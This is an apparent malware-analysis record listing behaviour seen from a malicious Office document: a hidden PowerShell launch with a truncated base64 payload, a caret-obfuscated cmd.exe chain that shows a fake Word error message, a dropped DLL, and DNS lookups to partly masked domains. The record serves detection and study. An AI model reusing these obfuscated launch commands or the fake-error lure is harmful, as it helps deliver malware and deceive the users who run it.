Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgAFMAZQB0AC0ASQBUAEUATQAgAFYAQQByAGkAYQBiAGwAZQA6AGsAeAB2ADQAIAAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0ARgAnAFMAWQBTAHQA...
- %HOMEPATH%\lw7ip41\p6oqqa8\w83i.dll
- %HOMEPATH%\lw7ip41\p6oqqa8\w83i.dll
- %HOMEPATH%\lw7ip41\p6oqqa8\w83i.dll
- 'sa##s.co.uk':80
- DNS ASK gr####ync.com.br
- DNS ASK sa##s.co.uk
- DNS ASK as###on.com.br
- DNS ASK bl##.#uozhou.xyz
- DNS ASK mo###iz.co.il
- DNS ASK he######harmaceutical.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAFMAZQB0AC0ASQBUAEUATQAgAFYAQQByAGkAYQBiAGwAZQA6AGsAe...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.